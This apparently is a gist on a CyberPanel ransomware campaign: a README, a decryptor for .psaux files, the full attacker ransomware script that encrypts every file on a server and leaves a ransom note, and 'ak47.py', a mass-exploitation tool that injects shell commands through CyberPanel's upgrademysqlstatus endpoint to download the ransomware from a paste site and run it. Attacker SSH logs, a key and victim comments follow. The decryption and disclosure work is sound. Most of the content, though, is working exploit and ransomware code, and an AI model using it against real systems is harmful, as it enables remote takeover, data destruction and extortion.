cyberpanel 0day leaked attack script

00-README.md

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

• A decryption script for .psaux ransoms
• A link to a decryptor for .encrypt ransoms
• A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extension they leave are:

• .psaux -> Custom ransomware, script based, decryptor available
• .encryp -> Variant from Babuk's source, decryptor available
• .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and files have the .psaux extension, due to a flaw in PSAUX's implementation, you should be able to use the decrypter 1-decrypt.sh

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

1-decrypt.sh

#!/bin/bash

######################################################################################
#                    LeakIX PSAUX CyberPanel Ransom campaign decrypter               #
#                                                                                    #
#                    You have been blessed by PSAUX                                  #
#                                                                                    #
#                    All your files can be decrypted.                                #
#                                                                                    #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Fun must be made on that channel for weak crypto,                                  #
#                                                                                    #
#  Ransomware Rushed by PSAUX                                                        #
#                                                                                    #
######################################################################################

# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK


### Fail the script if anything's wrong, that's people's data we're dealing with
set -e

echo "Running PSAUX CyberPanel decrypter..."

### Master key gently provided by PSAUX

MASTER_KEY="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$MASTER_KEY" > /tmp/private.pem

MASTER_KEY_PATH="/tmp/private.pem"

# Decrypt the encryption key with the master key
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc

local_key=$(cat /tmp/key.enc|xxd -p)
local_iv=$(cat /tmp/iv.enc|xxd -p)

echo "Recovered key: $local_key IV: $local_iv"


# Find all psaux file and decrypt them
find / -name "*.psaux" -type f|while read file; do
  openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
  echo "Restored ${file%\.psaux}"
done

actually.sh

#!/usr/bin/env bash

private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem

key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"

PRIVATE_KEY_PATH="/var/private.pem"

if [ ! -f "$PRIVATE_KEY_PATH" ]; then
  echo "Private key not found at $PRIVATE_KEY_PATH"
  exit 1
fi

PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
  echo "Could not read the private key (maybe permission issue?)"
  exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."

login_message="


######################################################################################
#               Encryptions ID : ${key_name}                                         #                
#                    You have been hacked by PSAUX                                   #
#                                                                                    #
#                    All your files have been encrypted.                             #
#                                                                                    #
# To restore access, you can contact us in Telegram                                  #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Payment must be made in cryptocurrency.                                            #
#                                                                                    #
# The price for decryption is 200 dollars.                                           #
# Sample decryption can be served upon request.                                      #
#                                                                                    #
# After payment, you will receive a key to run the decrypter script                  #
# on your system to restore your files.                                              #
# All your database is downloaded and if you are not going to pay in next 3 days     #
# its going to be published in darknet. Best Regards!                                #
#                                                                                    #
#                                                                                    #
#                                                                                    #
#  Ransomware Made by PSAUX                                                          #
#                                                                                    #
######################################################################################


"
echo "$login_message" > /etc/motd

key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"

echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
    echo "Key encrypted successfully: /var/key.enc"
else
    echo "Error with key encryption"
    exit 1
fi

echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
    echo "IV encrypted successfully: /var/iv.enc"
else
    echo "Error with IV encryption"
    exit 1
fi

excluded_dirs=(
    "/proc"
    "/sys"
    "/dev"
    "/run"
    "/etc"
    "/usr"
    "/tmp"
    "/var/run"
    "/var/lock"
    "/var/tmp"
    "/mnt"
    "/sbin"
    "/lib64"
    "/bin"
    "/boot"
    "/lib"
    "/lib32"
    "/srv"
    "/libx32"
    "/media"
    "/lost+found"
)

excluded_files=(
    "/var/key.enc"
    "/var/iv.enc"
    "/var/decrypter.sh"
    "/var/index_template.html"
)

is_excluded() {
    local path=$1
    for excluded in "${excluded_dirs[@]}"; do
        if [[ "$path" == "$excluded"* ]]; then
            return 0
        fi
    done
    for excluded in "${excluded_files[@]}"; do
        if [[ "$path" == "$excluded" ]]; then
            return 0
        fi
    done
    return 1
}

encrypt_directory() {
    local dir=$1
    echo "Encrypting directory: $dir"
    find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
        if ! is_excluded "$file"; then
            echo "Encrypting file: $file"
            openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
            if [ $? -eq 0 ]; then
                echo "[+] : ${file}.psaux"
                rm -f "$file"
            else
                echo "Error encrypting: $file"
            fi
        else
            echo "Excluded file: $file"
        fi
    done
}

encrypt_directory "/"

find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
    if ! is_excluded "$dir"; then
        cp /var/index_template.html "$dir/index.html"
    fi
done

find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
    if ! is_excluded "$file"; then
        echo "[+] : $file"
        openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
        if [ $? -eq 0 ]; then
            echo "[+] : ${file}.psaux"
            rm -f "$file"
        else
            echo "Error encrypting: $file"
        fi
    else
        echo "Excluded file: $file"
    fi
done

rm -- "$0" && exit 0

ak47.py

import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None

def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"

    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"

def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout

def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)

        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again

        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")

        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")

        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")

        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")

def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]

        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}

            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")

    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)

    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5

    main(targets_file, max_threads)

auth.log

Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2

ssh-authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai

I have found the decrypted file on server, its build with go executable , I have run file on sandbox, and its print key before start encryption key but every time run its give new key .. can we reversed engineer the file to know what methods using on it ?

Maybe you can share the file here?

Hi @v0idxyz,

Thank you for sharing the decryption tool. I’ve noticed that some users have successfully decrypted .encryp files using it.

However, I’ve followed the provided instructions and encountered an issue. While the file extensions are changed, the content remains encrypted and unreadable.

Could you please provide additional guidance or clarify if there are any prerequisites or common mistakes to avoid? Your help would be greatly appreciated.

Thank you in advance!

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

I'm after the same